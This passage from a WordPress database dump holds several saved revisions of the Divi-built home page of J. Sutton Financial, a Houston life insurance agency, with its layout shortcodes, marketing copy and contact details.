style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 20:08:01','2023-03-26 20:08:01','',138,'http://cmdev-site1.com/?p=536',0,'revision','',0),(537,1,'2023-03-26 20:10:14','2023-03-26 20:10:14','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" column_structure=\"1_4,3_4\"][et_pb_column type=\"1_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"86px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||103px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"61px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 20:10:14','2023-03-26 20:10:14','',138,'http://cmdev-site1.com/?p=537',0,'revision','',0),(540,1,'2023-03-26 20:11:31','2023-03-26 20:11:31','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_4,3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" global_colors_info=\"{}\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" global_colors_info=\"{}\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"86px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"11px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||143px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"12px|||||\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: #ffffff;\">info@JSuttonFinancial.com</a></span><br /><span style=\"color: #ffffff;\"><a href=\"tel:713-254-3439\" style=\"color: #ffffff;\">(713) 254-3439</a></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">©2023 J. Sutton Financial | All Rights Reserved | Privacy Policy</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 20:11:31','2023-03-26 20:11:31','',138,'http://cmdev-site1.com/?p=540',0,'revision','',0),(539,1,'2023-03-26 20:10:46','2023-03-26 20:10:46','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" _module_preset=\"bfc539b2-ac54-4571-be42-6a549fd9d36c\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_margin=\"||9px|||\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" column_structure=\"1_4,3_4\"][et_pb_column type=\"1_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_menu active_link_color=\"#3f3f3f\" _builder_version=\"4.20.2\" _module_preset=\"default\" menu_text_color=\"#FFFFFF\" menu_font_size=\"18px\" background_enable_color=\"off\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/et_pb_menu][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_typing_effect before_typing_effect=\"J. Sutton Financial,\" typing_effect=\"an Independent Agency for American Income Life Insurance Company  \" before_new_line=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#FFFFFF\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][/dsm_typing_effect][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" text_font_size=\"18px\" global_colors_info=\"{}\"]<p>J. Sutton Financial is headquartered in Houston, TX and serves multiple communities across the state.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_button button_one_text=\"Learn More\" button_one_lightbox_close_color=\"#FFFFFF\" button_two_text=\"Work for Us\" button_two_lightbox_close_color=\"#FFFFFF\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#ffffff\" button_one_border_width=\"0px\" button_one_border_color=\"RGBA(255,255,255,0)\" button_one_border_radius=\"14px\" custom_button_two=\"on\" button_two_text_color=\"#000000\" button_two_bg_color=\"#ffffff\" button_two_border_width=\"0px\" button_two_border_color=\"RGBA(255,255,255,0)\" button_two_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"2px||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Umbrella-Roll-in-Icon.png\" title_text=\"Umbrella Roll in Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||18px|||\" custom_padding=\"57px|||||\" global_colors_info=\"{}\"]<h2><strong>Providing Premium Life Insurance<br />Policies to Americans Nationwide</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-7px|||||\" global_colors_info=\"{}\"]<p>Sutton Financial provides high quality life insurance policies to Texans. Our agents proudly serve individuals from all walks of life, and can help you choose the right insurance policy to protect you and yours for years to come. J. Sutton Financial agents take pride in being approachable and easy to work with, helping you to make the right decisions for your family for decades to come.</p>[/et_pb_text][dsm_button button_one_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#cccac7\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"86px||0px|||\" global_colors_info=\"{}\"]<h2><strong>Looking for a New Career? Learn How Arias Can Help Grow Your Future.</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#000000\" text_font_size=\"16px\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"]<p>Sutton Financial is always looking for new, motivated talent to join our fun team of highly trained agents and managers. If you\'re looking to break out of the standard mold and take your career to the next level, look no further. Find out how you can grow together with J. Sutton Financial.</p>[/et_pb_text][dsm_button button_one_text=\"Apply Now!\" button_alignment=\"center\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_button_one=\"on\" button_one_text_color=\"#000000\" button_one_bg_color=\"#FFFFFF\" button_one_border_width=\"0px\" button_one_border_radius=\"14px\" global_colors_info=\"{}\"][/dsm_button][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/People-Icon.png\" title_text=\"People Icon\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Downtown-Houston-skyline-Black-White-6139-x-2500-scaled.jpg\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"199.3px\" custom_padding=\"||143px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||-4px|||\" custom_padding=\"112px|||||\" global_colors_info=\"{}\"]<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Proudly Headquartered in Houston, Texas</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"#666666\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-20px|auto||auto||\" custom_padding=\"0px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Justin-Sutton-rev-1_black_on_transparent_high-res-1.png\" title_text=\"Justin-Sutton-rev-1_black_on_transparent_high-res (1)\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" custom_padding=\"12px|||||\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" link_font=\"||||on||||dotted\" custom_margin=\"62px|||||\" custom_padding=\"29px||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"]<p style=\"text-align: center;\"><span style=\"color: #ffffff;\">340 North Sam Houston Parkway East</span><br /><span style=\"color: #ffffff;\">Houston, TX 77060</span><br /><span style=\"color: #ffffff;\"><a href=\"mailto:info@JSuttonFinancial.com\" style=\"color: 